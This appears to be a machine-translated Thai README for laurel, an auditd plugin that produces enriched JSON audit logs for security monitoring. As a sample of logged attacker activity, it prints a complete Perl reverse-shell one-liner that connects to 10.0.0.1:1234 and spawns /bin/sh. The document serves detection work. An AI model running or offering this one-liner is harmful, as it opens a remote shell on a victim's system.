laurel
v0.6.4
ลอเรลเป็นปลั๊กอินหลังการประมวลผลเหตุการณ์สำหรับ การตรวจสอบ (8) ที่สร้างบันทึกการตรวจสอบที่ใช้ JSON ที่มีประโยชน์และมีประโยชน์สำหรับการตั้งค่าการตรวจสอบความปลอดภัยที่ทันสมัย
เอกสารที่สอดคล้องกับการเปิดตัวที่เสถียรล่าสุดสามารถพบได้ที่นี่
TLDR: แทนที่จะเป็นเหตุการณ์การตรวจสอบที่มีลักษณะเช่นนี้ ...
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… ลอเรล เปลี่ยนพวกเขาให้เป็นบันทึก JSON ซึ่งความยุ่งเหยิงที่ผู้โจมตี/ผู้ทดสอบการเจาะ/ทีมสีแดงกำลังพยายามทำให้เห็นได้ชัดในครั้งแรก:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
สิ่งนี้เกิดขึ้นที่แหล่งที่มาเนื่องจาก ลอเรล ทำงานบนโฮสต์ที่มีการสร้างเหตุการณ์การตรวจสอบ เหตุการณ์ได้รับการเสริมด้วยข้อมูลที่เป็นประโยชน์เกี่ยวกับกระบวนการหลัก (PPID):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
รายละเอียดการกำหนดค่าและการดำเนินงานอธิบายไว้ในหน้าคู่มือ Laurel (8) รายละเอียดเกี่ยวกับรูปแบบการบันทึกและเหตุผลสามารถพบได้ในหน้าคู่มือลอเรล (7) หน้า Laurel-Audit-Rules (7) มีคำแนะนำและตัวอย่างสำหรับการกำหนดค่ากฎการตรวจสอบที่มีประโยชน์สำหรับการตรวจจับกลยุทธ์ของผู้โจมตี
คำแนะนำการติดตั้ง ลอเรล มีคำแนะนำเกี่ยวกับวิธีการสร้าง Laruel จากแหล่งที่มาและวิธีการติดตั้งและกำหนดค่า
เราพัฒนา ลอเรล เพราะเราไม่พอใจกับชุดคุณสมบัติและลักษณะประสิทธิภาพของโครงการและผลิตภัณฑ์ที่มีอยู่ โปรดดูเอกสารประสิทธิภาพสำหรับรายละเอียด
ใบอนุญาตสาธารณะ GNU ทั่วไปเวอร์ชัน 3
โลโก้ถูกสร้างขึ้นโดย Birgit Meyer <[email protected]>
